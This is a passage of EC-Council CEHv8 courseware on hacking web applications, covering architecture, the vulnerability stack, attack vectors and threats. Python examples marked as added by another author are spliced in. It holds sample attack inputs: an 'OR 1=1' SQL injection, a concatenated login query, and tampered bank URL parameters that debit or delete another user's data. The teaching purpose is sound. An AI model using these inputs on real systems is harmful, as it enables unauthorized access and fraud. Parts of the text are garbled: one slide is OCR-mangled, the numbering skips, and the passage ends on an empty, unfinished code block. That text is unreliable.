
Hacking web applications CEHv8 module 13


Step by step to endorse your knowledge in hacking web applications



1. Hacking Web Applications, Module 13
2. Exam 312-50 Certified Ethical Hacker. Ethical Hacking and Countermeasures v8, Module 13: Hacking Web Applications. Engineered by Hackers. Presented by Professionals. Ethical Hacking and Countermeasures Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited. Module 13 Page 1724
3. Security News: XSS Attacks Lead Pack As Most Frequent Attack Type

Source: http://www.darkreading.com

Secure cloud hosting company, FireHost, has today announced the findings of its latest web application attack report, which provides statistical analysis of the 15 million cyber-attacks blocked by its servers in the US and Europe during Q3 2012. The report looks at attacks on the web applications, databases and websites of FireHost's customers between July and September, and offers an impression of the current internet security climate as a whole.

Amongst the cyber-attacks registered in the report, FireHost categorises four attack types in particular as representing the most serious threat. These attack types are among FireHost's 'Superfecta' and they consist of Cross-site Scripting (XSS), Directory Traversals, SQL Injections, and Cross-site Request Forgery (CSRF).

One of the most significant changes in attack traffic seen by FireHost between Q2 and Q3 2012 was a considerable rise in the number of cross-site attacks; in particular, XSS and CSRF attacks rose to represent 64% of the group in the third quarter (a 28% increased penetration). XSS is now the most common attack type in the Superfecta, with CSRF now in second. FireHost's servers blocked more than one million XSS attacks during this period alone, a figure which rose 69%, from 603,016 separate attacks in Q2 to 1,018,817 in Q3. CSRF attacks reached second place on the Superfecta at 843,517.

Cross-site attacks are dependent upon the trust developed between site and user. XSS attacks involve a web application gathering malicious data from a user via a trusted site (often coming in the form of a hyperlink containing malicious content), whereas CSRF attacks exploit the trust that a site has for a particular user instead. These malicious security exploits can also be used to steal sensitive information such as user names, passwords and credit card details - without the site or user's knowledge. The severity of these attacks is dependent on the sensitivity of the data handled by the vulnerable site and this ranges from personal data found on social networking sites, to the financial and confidential details entered on ecommerce sites amongst others. A great number of organisations have fallen victim to such attacks in recent years including attacks on PayPal, Hotmail and eBay, the latter falling victim to a single CSRF attack in 2008 which targeted 18 million users of its Korean website. Furthermore, in September this year, IT giants Microsoft and Google Chrome both ran extensive patches targeted at securing XSS flaws, highlighting the prevalence of this growing online threat.

"Cross-site attacks are a severe threat to business operations, especially if servers aren't properly prepared," said Chris Hinkley, CISSP - a Senior Security Engineer at FireHost. "It's vital that any site dealing with confidential or private user data takes the necessary precautions to ensure applications remain protected. Locating and fixing any website vulnerabilities and flaws is a key step in ensuring your business and your customers don't fall victim to an attack of this nature. The consequences of which can be significant, in terms of both financial and reputational damage."

The Superfecta attack traffic for Q3 2012 can be broken down as follows: As with Q2 2012, the majority of attacks FireHost blocked during the third calendar quarter of 2012 originated in the United States (11 million / 74%). There has, however, been a great shift in the number of attacks originating from Europe this quarter, as 17% of all malicious attack traffic seen by FireHost came from this region. Europe overtook Southern Asia (which was responsible for 6%) to become the second most likely origin of malicious traffic.

Varied trends among the Superfecta attack techniques are demonstrated between this quarter and last: During the build-up to the holiday season, ecommerce activity ramps up dramatically and cyber-attacks that target website users' confidential data are also likely to increase as a result. As well as cross-site attacks, the other Superfecta attack types, SQL Injection and Directory Traversal, still remain a significant threat despite a slight reduction in frequency this quarter. Ecommerce businesses need to be aware of the risks that this period may present to their security, as Todd Gleason, Director of Technology at FireHost, explains: "You'd better believe that hackers will try and take advantage of any surges in holiday shopping. They will be devising a number of ways they can take advantage of any web application vulnerabilities and will use an assortment of different attack types and techniques to do so. When it's a matter of confidential data at risk, including customers' financial information - credit card and debit card details - there's no room for complacency. These organisations need to know that there's an increased likelihood of attack during this time and it's their responsibility to take the necessary steps to stop such attacks."

Copyright © 2013 UBM Tech, All rights reserved. http://www.darkreading.com/security/news/240009508/firehost-q3-web-application-report-xss-attacks-lead-pack-as-most-frequent-attack-type.html
6. Module Objectives

The main objective of this module is to show the various kinds of vulnerabilities that can be discovered in web applications, and the attacks that exploit them. The module starts with a detailed description of web applications and the threats they face. The hacking methodology reveals the steps involved in a planned attack, and the tools attackers use to exploit web application vulnerabilities are discussed. Countermeasures that thwart such attacks are highlighted, along with the security tools that help a network administrator monitor and manage a web application. Finally, web application pen testing is discussed.

This module familiarizes you with:
- How Web Applications Work
- Web Attack Vectors
- Web Application Threats
- Web App Hacking Methodology
- Footprint Web Infrastructure
- Hacking Web Servers
- Analyze Web Applications
- Attack Authentication Mechanism
- Attack Authorization Schemes
- Session Management Attack
- Attack Data Connectivity
- Attack Web App Client
- Attack Web Services
- Web Application Hacking Tools
- Countermeasures
- Web Application Security Tools
- Web Application Firewall
- Web Application Pen Testing
8. Module Flow

Web applications are application programs accessed over an Internet connection; they use HTTP as their primary communication protocol. Attackers target these applications for several reasons, and they are exposed to a variety of attacks. For a clear understanding of hacking web applications, the topic is divided into the following sections:
- Web App Concepts
- Web App Threats
- Hacking Methodology
- Web Application Hacking Tools
- Countermeasures
- Security Tools
- Web App Pen Testing

Let us begin with the web app concepts.
9. Web App Concepts

This section introduces the web application and its components, explains how a web application works and describes its architecture. It provides insight into Web 2.0 applications, the vulnerability stack, and web attack vectors.
10. Web Application Security Statistics

Source: https://www.whitehatsec.com

According to the WhiteHat Security website statistics report of 2012, cross-site scripting vulnerabilities are found in more web applications than any other class of vulnerability. From the graph you can observe that in 2012 cross-site scripting was the most common vulnerability, found in 55% of web applications, while only 10% of web application attacks were based on insufficient session expiration vulnerabilities. To minimize the risk associated with cross-site scripting vulnerabilities in web applications, you have to adopt the necessary countermeasures against them.
11. FIGURE 13.1: WhiteHat Security Website Statistics Report, 2012. Bar chart of the percentage of web applications affected by each vulnerability class: Cross-Site Scripting, Information Leakage, Content Spoofing, Insufficient Authorization, Cross-Site Request Forgery, Brute Force, Predictable Resource Location, SQL Injection, Session Fixation, Insufficient Session Expiration.
12. Introduction to Web Applications

- Though web applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, session hijacking, etc.
- Web applications provide an interface between end users and web servers through a set of web pages that are generated at the server end or contain script code to be executed dynamically within the client web browser.
- New web technologies such as Web 2.0 provide more attack surface for web application exploitation.
- Web applications and Web 2.0 technologies are invariably used to support critical business functions such as CRM, SCM, etc. and to improve business efficiency.

Web applications are applications that run on a remote web server and send their output over the Internet. Web 2.0 technologies are used by web-based applications for communication with users, clients, third-party users, etc. A web application is comprised of many layers of functionality, but it is generally considered a three-layered architecture consisting of presentation, logic, and data layers. The web architecture relies substantially on the technology popularized by the World Wide Web: Hypertext Markup Language (HTML) and the primary transport medium, Hypertext Transfer Protocol (HTTP). HTTP is the medium of communication between the server and the client. Typically it operates over TCP port 80 (443 for HTTPS), but a server may listen on any other port. Web applications provide an interface between end users and web servers through a set of web pages that are generated at the server end or contain script code to be executed dynamically within the client web browser. Some of the popular web servers today are Microsoft IIS, the Apache Software Foundation's Apache HTTP Server, AOL/Netscape's Enterprise Server, and Sun ONE. Resources are identified by Uniform Resource Identifiers (URIs), and they may either be static pages or contain dynamic content.

13. Since HTTP is stateless, i.e., the protocol does not maintain session state, the requests for resources are treated as separate and unique; the server does not by itself remember which earlier requests came from the same client. Cookies can be used as tokens that the server hands over to the client so that the client can present the token on later requests and be recognized. Cookies are not perfect from a security point of view, however: they are stored on the client (often on its local hard disk, so that the user does not have to request a new token for each query) and can therefore be copied and replayed by whoever obtains them. Though web applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, session hijacking, etc. Organizations rely on web applications and Web 2.0 technologies to support key business processes and improve performance, and new web technologies such as Web 2.0 provide more attack surface for web application exploitation. Attackers discover the different types of vulnerabilities present in web applications and exploit them to compromise the application, and they use tools to launch such attacks.
14. Web Application Components

The components of a web application are as follows:
- Login: Most websites allow authenticated users to access the application by means of a login, i.e., to access the service or content offered by the web application the user needs to submit a username and password. Example: gmail.com.
- The Web Server: Software or hardware intended to deliver web content that can be accessed through the Internet, for example the web pages served to the web browser by the web server.
- Session Tracking Mechanism: Each web application has a session tracking mechanism. The session can be tracked using cookies, URL rewriting, or Secure Sockets Layer (SSL) session information.
- User Permissions: When you are logged in but not permitted to access a particular web page, the application may redirect you to the login page or to another page.
- The Application Content: An interactive program that accepts web requests from clients and uses the parameters sent by the web browser to carry out certain functions.
- Data Access: Usually the web pages reach the database through a data access library in which all the database connection details are stored.

15.
- The Data Store: The repository for the important data that is shared and synchronized between the application's child processes or threads. This stored information is essential to the higher levels of the application framework. The data store and the web server need not be on the same network; they only need to be reachable from each other over a network connection.
- Role-level System Security
- Application Logic: Web applications are usually divided into tiers, of which the application logic is the middle tier. It receives the request from the web browser and serves it accordingly. The services offered by the application logic include querying and updating the database as well as generating the user interface.
- Logout: A user can log out of the web application or close the browser so that the session and the application state associated with it end. The session ends either on the initiative of the application logic or automatically when the servlet session times out.
16. How Web Applications Work

Slide diagram: the application server runs the query SELECT * from news where id=6329 against the database; output: ID 6329, Topic Tech, News CNN.

Whenever someone clicks a link or types in the browser, the requested website or content is displayed almost immediately, but what is the mechanism behind this? The following is the step-by-step process that takes place once a user sends a request for particular content or a website, with multiple computers involved. The web application model is explained in three layers. The first layer deals with user input through a web browser or user interface. The second layer contains the dynamic content generation technology, such as JSP (JavaServer Pages) and Java servlets or ASP (Active Server Pages). The last layer contains the database that stores customer data such as user names and passwords, credit card details, and other related information.

Let's see how the user triggers the initial request through the browser to the web application server:
1. The user types the website name or URL in the browser and the request is sent to the web server.
2. On receiving the request, the web server checks the file extension:
   - If the user requests a simple web page with an HTM or HTML extension, the web server processes the request itself and sends the file to the user's browser.
   - If the user requests a web page with the extension CFM, CFML, or CFC, the request must be processed by the web application server, so the web server passes the user's request on to it.
3. The web application server processes the user's request. To do so, it accesses the database at the third layer and performs the requested task by updating or retrieving the information stored there.
4. Once done processing the request, the web application server sends the results to the web server, which in turn sends them to the user's browser.

17. FIGURE 13.2: Working of Web Application (User, Login Form, Internet, Firewall, Web Server).
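The four steps above as an added example in Python (not EC-Council's code): a minimal web-server function that serves .htm/.html files itself and hands dynamic paths to an application-server function, which runs the slide's query, SELECT * from news where id=6329, against an in-memory SQLite database. The news rows and the static page are constructed for the demo, and the .cfm extension is only a stand-in for whatever the application server handles. Two versions of the application tier are shown: the unsafe one pastes the id parameter into the SQL text, which is the parameter manipulation the module goes on to describe; the safe one validates and binds it.

```python
"""Three-tier request flow: browser -> web server -> application server -> database.
Added example, not EC-Council's code; table rows and static page are constructed."""
import sqlite3
from urllib.parse import parse_qs, urlparse

# Tier 3: constructed database standing in for the real data store.
_db = sqlite3.connect(":memory:")
_db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, topic TEXT, news TEXT)")
_db.executemany("INSERT INTO news VALUES (?, ?, ?)", [
    (6329, "Tech", "CNN"),
    (6330, "Sports", "BBC"),
    (6331, "Finance", "Reuters"),
])

# Static content the web server can answer without the application server.
STATIC_FILES = {"/index.html": "<h1>Welcome</h1>"}


def app_server_unsafe(news_id: str) -> list:
    """Tier 2 as it is often written: the parameter is pasted into the SQL text.
    The slide's SELECT * from news where id=6329 becomes attacker-controlled as
    soon as id is anything other than a number."""
    sql = "SELECT id, topic, news FROM news WHERE id=" + news_id
    return _db.execute(sql).fetchall()


def app_server_safe(news_id: str) -> list:
    """Tier 2 hardened: check the parameter's type, then bind it, so the database
    sees it as data and never as part of the statement."""
    if not news_id.isdigit():
        raise ValueError("id must be a positive integer")
    sql = "SELECT id, topic, news FROM news WHERE id=?"
    return _db.execute(sql, (int(news_id),)).fetchall()


def web_server(url: str, safe: bool = True) -> tuple:
    """Tier 1: serve .htm/.html directly, hand everything else to the application
    server. Returns (status, body) like the response the browser would get."""
    parsed = urlparse(url)
    if parsed.path.endswith((".htm", ".html")):
        body = STATIC_FILES.get(parsed.path)
        return (200, body) if body is not None else (404, "")
    news_id = parse_qs(parsed.query).get("id", [""])[0]
    handler = app_server_safe if safe else app_server_unsafe
    try:
        rows = handler(news_id)
    except ValueError as exc:
        return (400, str(exc))
    return (200, rows)


if __name__ == "__main__":
    print(web_server("/index.html"))
    print(web_server("/news.cfm?id=6329"))
    # Manipulated parameter: the unsafe tier returns every row, the safe tier rejects it.
    print(web_server("/news.cfm?id=6329 OR 1=1", safe=False))
    print(web_server("/news.cfm?id=6329 OR 1=1", safe=True))
```

The only difference between the two handlers is who decides where the SQL statement ends: in the unsafe version the browser does, which is why the whole table comes back for `id=6329 OR 1=1`.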
18. Web Application Architecture

All web applications execute with the help of the web browser as the client. A web application uses a set of server-side scripts (ASP, PHP, etc.) and client-side scripts (HTML, JavaScript, etc.). The information is presented by the client-side scripts, while tasks such as storing and gathering the required data are carried out by the server-side scripts. In the following architecture, clients use different devices, web browsers, and external web services over the Internet to get the application executed using different scripting languages. Data access is handled by the database layer, using cloud services and a database server.

19. FIGURE 13.3: Web Application Architecture
- Clients: web browser, smart phones, web appliances, and external web services, connected over the Internet
- Presentation Layer: Flash, Silverlight, and JavaScript on the client; proxy server/cache, firewall, and web server (HTTP request parser, servlet container, resource handler, authentication and login) on the server side
- Business Layer: application server (J2EE, .NET, COM, COM+, XCode, C++), business logic, legacy application, data access
- Database Layer: cloud services, database server
20. Web 2.0 Applications

Web 2.0 refers to a new generation of web applications that provide an infrastructure for more dynamic user participation, social interaction, and collaboration. It offers various features such as:
- Advanced gaming
- Dynamic as opposed to static site content
- RSS-generated syndication
- Social networking sites (Flickr, Facebook, del.icio.us)
- Mash-ups (emails, IMs, electronic payment systems)
- Wikis and other collaborative applications
- Google Base and other free web services (Google Maps)
- Ease of data creation, modification, or deletion by individual users
- Online office software (Google Docs and Microsoft Light)
- Interactive encyclopedias and dictionaries
- Cloud computing websites such as Amazon.com
- Frameworks (Yahoo! UI Library, jQuery)
- Flash-rich interface websites
- Mobile applications (iPhone)
- New technologies like AJAX (Gmail, YouTube)
- Blogs (WordPress)
  22. 22. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications C E HV u l n e r a b i l i t y S t a c k _ C u s to m W e b A p p lic a tio n s B _ B u s in e s s Logic F la w s T e c h n ic a l V u ln e ra b ilitie s T h ird P a rty C o m p o n e n ts E l E O p e n S o u rc e / C o m m e rc ia l f ^ ‫־‬w r O ra c le / M yS Q L / M S SQL A p a c h e / M ic r o s o ft IIS Apache W in d o w s / L in u x /OSX R o u te r / S w itc h IPS / IDS C o p yrig h t © by E&C01nal.A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited . D a ta b a s e W e b S e rv e r O p e ra tin g S y s te m N e tw o r k S e c u rity V u l n e r a b i l i t y S t a c k i f - The w eb applications are m aintained and accessed through various levels th a t include: custom w eb applications, th ird -p a rty com ponents, databases, w eb servers, operating systems, netw orks, and security. All the m echanism s or services em ployed at each level help the user in one or the oth e r way to access the w eb application securely. W hen talking about web applications, security is a critical com ponent to be considered because w eb applications are a m ajor sources o f attacks. The follow ing v u ln e ra b ility stack shows the levels and the corresponding elem ent/m echanism /service em ployed at each level th a t makes the web applications vulnerable: Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1744
FIGURE 13.4: Vulnerability Stack

Custom Web Applications: Business Logic Flaws, Technical Vulnerabilities
Third Party Components: Open Source / Commercial
Database: Oracle / MySQL / MS SQL
Web Server: Apache / Microsoft IIS
Operating System: Windows / Linux / OS X
Network: Router / Switch
Security: IPS / IDS
Web Attack Vectors

• An attack vector is a path or means by which an attacker can gain access to computer or network resources in order to deliver an attack payload or cause a malicious outcome
• Attack vectors include parameter manipulation, XML poisoning, client validation, server misconfiguration, web service routing issues, and cross-site scripting
• Security controls need to be updated continuously as the attack vectors keep changing with respect to a target of attack

An attack vector is a method of entering unauthorized systems to perform malicious attacks. Once the attacker gains access to the system or the network, he or she delivers an attack payload or causes a malicious outcome. No protection method is completely attack-proof, as attack vectors keep changing and evolving with new technological changes.

Examples of various types of attack vectors:

• Parameter manipulation: The attacker provides wrong input values to the web services and gains control over the SQL, LDAP, XPATH, and shell commands. When incorrect values are provided to the web services, they become vulnerable and are easily attacked through web applications running with web services.
• XML poisoning: Attackers provide manipulated XML documents that, when executed, can disturb the logic of the parsing method on the server. When huge XMLs are executed at the application layer, they can easily be compromised by the attacker to launch his or her attack and gather information.
• Client validation: Most client-side validation has to be supported by server-side authentication. The AJAX routines can be easily manipulated, which in turn makes a way for attackers to carry out SQL injection, LDAP injection, etc. and compromise the web application's key resources.
• Server misconfiguration: The attacker exploits the vulnerabilities in the web servers and tries to break the validation methods to get access to the confidential data stored on the servers.
• Web service routing issues: The SOAP messages are permitted to access different nodes on the Internet by the WS-Routers. The exploited intermediate nodes can give access to the SOAP messages that are communicated between two endpoints.
• Cross-site scripting: Whenever any infected JavaScript code is executed, the targeted browsers can be exploited by the attacker to gather information.
Module Flow

Web applications are targeted by attackers for various reasons. The first issue is that the quality of the source code, as it relates to security, is poor; another issue is an application with a "complex setup." Due to these loopholes, attackers can easily launch attacks by exploiting them. Now we will discuss the threats associated with web applications.

Web App Concepts | Web App Threats | Hacking Methodology | Web Application Hacking Tools | Countermeasures | Security Tools | Web App Pen Testing

This section lists and explains the various web application threats such as parameter/form tampering, injection attacks, cross-site scripting attacks, DoS attacks, session fixation attacks, improper error handling, etc.
Web Application Threats - 1

Web application threats are not limited to attacks based on URL and port 80. Despite using ports, protocols, and the OSI layer, the integrity of mission-critical applications must be protected from possible future attacks. Vendors who want to protect their products' applications must be able to deal with all methods of attack. The various types of web application threats are as follows:

Cookie Poisoning
By changing the information inside the cookie, attackers bypass the authentication process, and once they gain control over the network, they can either modify the content, use the system for a malicious attack, or steal information from the user's system.

Directory Traversal
Attackers exploit HTTP by using directory traversal, and they will be able to access restricted directories; they execute commands outside of the web server's root directory.

Unvalidated Input
In order to bypass the security system, attackers tamper with the HTTP requests, URL, headers, form fields, hidden fields, query strings, etc. Users' login IDs and other related data get stored in the cookies, and this becomes a source of attack for intruders. Attackers gain access to the victim's system using the information present in cookies. Examples of attacks caused by unvalidated input include SQL injection, cross-site scripting (XSS), buffer overflows, etc.

Cross-site Scripting (XSS)
An attacker bypasses the client's ID security mechanism and gains access privileges, and then injects malicious scripts into the web pages of a particular website. These malicious scripts can even rewrite the HTML content of the website.

Injection Flaws
Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as part of a command or query.

SQL Injection
This is a type of attack where SQL commands are injected by the attacker via input data; the attacker can then tamper with the data.

Parameter/Form Tampering
This type of tampering attack is intended to manipulate the parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, price and quantity of products, etc. This information is actually stored in cookies, hidden form fields, or URL query strings, and is used to increase application functionality and control. Man-in-the-middle is one example of this type of attack. Attackers use tools like WebScarab and Paros Proxy for these attacks.

Denial-of-Service (DoS)
A denial-of-service attack is an attacking method intended to terminate the operations of a website or a server and make it unavailable to intended users. For instance, a website related to a bank or email service is not able to function for a few hours to a few days. This results in loss of time and money.

Broken Access Control
Broken access control is a method used by attackers where a particular flaw has been identified related to the access control, where authentication is bypassed and the attacker compromises the network.

Cross-site Request Forgery
The cross-site request forgery method is a kind of attack where an authenticated user is made to perform certain tasks on the web application that an attacker chooses. For example, a user clicks on a particular link sent through an email or chat.

Information Leakage
Information leakage can cause great losses for a company. Hence, all sources such as systems or other network resources must be protected from information leakage by employing proper content filtering mechanisms.

Improper Error Handling
It is necessary to define how the system or network should behave when an error occurs. Otherwise, it may provide a chance for the attacker to break into the system. Improper error handling may lead to DoS attacks.

Log Tampering
Logs are maintained by web applications to track usage patterns such as user login credentials, admin login credentials, etc. Attackers usually inject, delete, or tamper with web application logs so that they can perform malicious actions or hide their identities.

Buffer Overflow
A web application's buffer overflow vulnerability occurs when it fails to guard its buffer properly and allows writing beyond its maximum size.

Broken Session Management
When security-sensitive credentials such as passwords and other useful material are not properly taken care of, these types of attacks occur. Attackers compromise the credentials through these security vulnerabilities.

Security Misconfiguration
Developers and network administrators should check that the entire stack is configured properly, or security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, framework, and custom code. Missing patches, misconfigurations, use of default accounts, etc. can be detected with the help of automated scanners, which attackers exploit to compromise web application security.

Broken Account Management
Even authentication schemes that are valid are weakened because of vulnerable account management functions including account update, forgotten or lost password recovery or reset, password changes, and other similar functions.

Insecure Storage
Web applications need to store sensitive information such as passwords, credit card numbers, account records, or other authentication information somewhere, possibly in a database or on a file system. If proper security is not maintained for these storage locations, then the web application may be at risk, as attackers can access the storage and misuse the information stored. Insecure storage of keys, certificates, and passwords allows the attacker to gain access to the web application as a legitimate user.
Web Application Threats - 2

Platform Exploits
Various web applications are built using different platforms such as BEA WebLogic and ColdFusion. Each platform has various vulnerabilities and exploits associated with it.

Insecure Direct Object References
When various internal implementation objects such as a file, directory, database record, or key are exposed through a reference by a developer, then an insecure direct object reference takes place. For example, where a bank account number is made a primary key, there is a good chance it can be compromised by the attacker based on such references.

Insecure Cryptographic Storage
When sensitive data has been stored in the database, it has to be properly encrypted using cryptography. A few cryptographic encryption methods developed by developers are not up to par. Cryptographically very strong encryption methods have to be used. At the same time, care must be taken to store the cryptographic keys. If these keys are stored in insecure places, then the attacker can obtain them easily and decrypt the sensitive data.
Authentication Hijacking
In order to identify the user, every web application uses user identification such as a user ID and password. Once the attacker compromises the system, various malicious things like theft of services, session hijacking, and user impersonation can occur.

Network Access Attacks
Network access attacks can majorly impact web applications. These can have an effect on the basic level of services within an application and can allow access that standard HTTP application methods would not have access to.

Cookie Snooping
Attackers use cookie snooping on a victim's system to analyze their surfing habits and sell that information to other attackers, or may use this information to launch various attacks on the victim's web applications.

Web Services Attacks
Web services are process-to-process communications that have special security issues and needs. An attacker injects a malicious script into a web service and is able to disclose and modify application data.

Insufficient Transport Layer Protection
SSL/TLS authentication should be used for authentication on websites, or the attacker can monitor network traffic to steal an authenticated user's session cookie. Various threats such as account theft, phishing attacks, and admin account compromise may happen after systems have been compromised.

Hidden Manipulation
These types of attacks are mostly used by attackers to compromise e-commerce websites. Attackers manipulate the hidden fields and change the data stored in them. Several online stores face this type of problem every day. Attackers can alter prices and conclude transactions with the prices of their choice.

DMZ Protocol Attacks
The DMZ (Demilitarized Zone) is a semi-trusted network zone that separates the untrusted Internet from the company's trusted internal network. An attacker who is able to compromise a system that allows other DMZ protocols has access to other DMZs and internal systems. This level of access can lead to:

• Compromise of the web application and data
• Defacement of websites
• Access to internal systems, including databases, backups, and source code

Unvalidated Redirects and Forwards
Attackers make a victim click an unvalidated link that appears to be a valid site. Such redirects may attempt to install malware or trick victims into disclosing passwords or other sensitive information. Unsafe forwards may allow access control bypass leading to:

• Session fixation attacks
• Security management exploits
• Failure to restrict URL access
• Malicious file execution

Failure to Restrict URL Access
An application often safeguards or protects sensitive functionality and prevents the display of links or URLs for protection. Attackers access those links or URLs directly and perform illegitimate operations.

Obfuscation Application
Attackers usually work hard at hiding their attacks and avoiding detection. Network and host intrusion detection systems (IDSs) are constantly looking for signs of well-known attacks, driving attackers to seek different ways to remain undetected. The most common method of attack obfuscation involves encoding portions of the attack with Unicode, UTF-8, or URL encoding. Unicode is a method of representing letters, numbers, and special characters so these characters can be displayed properly, regardless of the application or underlying platform in which they are used.

Security Management Exploits
Some attackers target security management systems, either on networks or on the application layer, in order to modify or disable security enforcement. An attacker who exploits security management can directly modify protection policies, delete existing policies, add new policies, and modify applications, system data, and resources.

Session Fixation Attack
In a session fixation attack, the attacker tricks or attracts the user to access a legitimate web server using an explicit session ID value.

Malicious File Execution
Malicious file execution vulnerabilities have been found on most applications. This vulnerability is caused by unchecked input into the web server. Due to this unchecked input, the attackers' files are easily executed and processed on the web server. In addition, the attacker performs remote code execution, installs a rootkit remotely, and in at least some cases takes complete control over the systems.
Unvalidated Input

• An attacker exploits input validation flaws to perform cross-site scripting, buffer overflow, injection attacks, etc. that result in data theft and system malfunctioning
• Input validation flaws refer to a web application vulnerability where input from a client is not validated before being processed by web applications and backend servers

An input validation flaw refers to a web application vulnerability where input from a client is not validated before being processed by web applications and backend servers. Sites try to protect themselves from malicious attacks through input filtration, but there are various methods prevailing for the purpose of encoding. Many HTTP inputs have multiple formats that make filtering very difficult. The canonicalization method is used to simplify the encodings and is useful in avoiding various vulnerable attacks. Web applications use only a client-side mechanism in input validation, and attackers can easily bypass it. In order to bypass the security system, attackers tamper with the HTTP requests, URLs, headers, form fields, hidden fields, and query strings. Users' login IDs and other related data get stored in the cookies, and this becomes a source of attack for intruders. Attackers gain access to the systems by using the information present in the cookies. Various methods used by hackers are SQL injection, cross-site scripting (XSS), buffer overflows, format string attacks, cookie poisoning, and hidden field manipulation, which result in data theft and system malfunctioning.
FIGURE 13.5: Unvalidated Input

Browser Post Request: http://juggyboy.com/login.aspx?user=jasons&pass=springfield

Browser input not validated by the web application; the modified query sent to the database is built as:

    string sql = "select * from Users where user = '" + User.Text + "' and pwd='" + Password.Text + "'";
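The login query from Figure 13.5, as an added Python example that is not part of the module: the concatenated form beside a validated, parameterized one, run against an in-memory SQLite table of constructed users (the allowlist rule for user names is an assumption of this example).

```python
import re
import sqlite3

# Constructed sample rows standing in for the "Users" table in Figure 13.5.
SAMPLE_USERS = [("jasons", "springfield"), ("o'neil", "hunter2")]

# Server-side validation rule (an assumption for this example): a user name is
# 1-32 characters from a small allowlist, so quotes never reach the query.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def setup_db() -> sqlite3.Connection:
    """Create an in-memory database populated with the constructed users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (user TEXT, pwd TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def build_query_unvalidated(user: str, pwd: str) -> str:
    """Same shape as the module's C# snippet: the browser's values are spliced
    into the SQL text, so a quote in the input changes the query itself."""
    return ("select * from Users where user = '" + user
            + "' and pwd='" + pwd + "'")


def login_unvalidated(conn: sqlite3.Connection, user: str, pwd: str) -> str:
    """Returns 'ok', 'denied', or 'error' when the input broke the SQL."""
    try:
        row = conn.execute(build_query_unvalidated(user, pwd)).fetchone()
    except sqlite3.OperationalError:
        return "error"  # the input was interpreted as part of the query
    return "ok" if row else "denied"


def is_valid_username(user: str) -> bool:
    """Server-side allowlist check (client-side checks can be bypassed)."""
    return USERNAME_RE.fullmatch(user) is not None


def find_user_parameterized(conn: sqlite3.Connection, user: str):
    """Parameterized lookup on its own: a quote in the value stays data."""
    return conn.execute(
        "select user from Users where user = ?", (user,)
    ).fetchone()


def login_parameterized(conn: sqlite3.Connection, user: str, pwd: str) -> str:
    """Hardened form: validate first, then bind values with placeholders so
    the database driver always treats them as data, never as SQL."""
    if not is_valid_username(user):
        return "invalid"
    row = conn.execute(
        "select * from Users where user = ? and pwd = ?", (user, pwd)
    ).fetchone()
    return "ok" if row else "denied"
```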
Parameter/Form Tampering

• A web parameter tampering attack involves the manipulation of parameters exchanged between client and server in order to modify application data such as user credentials and permissions, price, and quantity of products
• A parameter tampering attack exploits vulnerabilities in integrity and logic validation mechanisms that may result in XSS, SQL injection, etc.

Parameter tampering is a simple form of attack aimed directly at the application's business logic. This attack takes advantage of the fact that many programmers rely on hidden or fixed fields (such as a hidden tag in a form or a parameter in a URL) as the only security measure for certain operations. To bypass this security mechanism, an attacker can change these parameters.

Detailed Description

Serving the requested files is the main function of web servers. During a web session, parameters are exchanged between the web browser and the web application in order to maintain information about the client's session, which eliminates the need to maintain a complex database on the server side. URL queries, form fields, and cookies are used to pass the parameters. Changed parameters in the form field are the best example of parameter tampering. When a user selects an HTML page, it is stored as a form field value and transferred as an HTTP page to the web application. These values may be pre-selected (combo box, check box, radio buttons, etc.), free text, or hidden. An attacker can manipulate these values. In some extreme cases, it is just like saving the page, editing the HTML, and reloading the page in the web browser.

Hidden fields that are invisible to the end user provide information status to the web application. For example, consider a product order form that includes the hidden field as follows:

    <input type="hidden" name="price" value="99.90">

Combo boxes, check boxes, and radio buttons are examples of pre-selected parameters used to transfer information between different pages, while allowing the user to select one of several predefined values. In a parameter tampering attack, an attacker may manipulate these values. For example, consider a form that includes the combo box as follows:

    <FORM METHOD=POST ACTION="xferMoney.asp">
    Source Account: <SELECT NAME="SrcAcc">
    <OPTION VALUE="123456789">******789</OPTION>
    <OPTION VALUE="868686868">******868</OPTION></SELECT>
    <BR>Amount: <INPUT NAME="Amount" SIZE=20>
    <BR>Destination Account: <INPUT NAME="DestAcc" SIZE=40>
    <BR><INPUT TYPE=SUBMIT> <INPUT TYPE=RESET>
    </FORM>

Bypassing

An attacker may bypass the need to choose between two accounts by adding another account into the HTML page source code. The new combo box is displayed in the web browser and the attacker can choose the new account.

HTML forms submit their results using one of two methods: GET or POST. In the GET method, all form parameters and their values appear in the query string of the next URL, which the user sees. An attacker may tamper with this query string. For example, consider a web page that allows an authenticated user to select one of his or her accounts from a combo box and debit the account with a fixed unit amount. When the submit button is pressed in the web browser, the URL is requested as follows:

    http://www.juggybank.com/cust.asp?profile=21&debit=2500

An attacker may change the URL parameters (profile and debit) in order to debit another account:

    http://www.juggybank.com/cust.asp?profile=82&debit=1500

There are other URL parameters that an attacker can modify, including attribute parameters and internal modules. Attribute parameters are unique parameters that characterize the behavior of the uploading page. For example, consider a content-sharing web application that enables the content creator to modify content, while other users can only view the content. The web server checks whether the user who is accessing an entry is the author or not (usually by cookie). An ordinary user will request the following link:

    http://www.juggybank.com/stat.asp?pg=531&status=view

An attacker can modify the status parameter to "delete" in order to delete permission for the content.

    http://www.juggybank.com/stat.asp?pg=147&status=delete

Parameter/form tampering can lead to theft of services, escalation of access, session hijacking, and assuming the identity of other users, as well as parameters allowing access to developer and debugging information.

FIGURE 13.6: Form Tampering (tampering with the URL parameters; other parameters can be changed, including attribute parameters)
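An added example (not the module's code) of how the server side should handle the two cases above, the hidden price field and the cust.asp profile/debit request: the price comes only from a server-side catalog, and the profile parameter is checked against the accounts owned by the authenticated session. The catalog, account ownership and balances are constructed sample data.

```python
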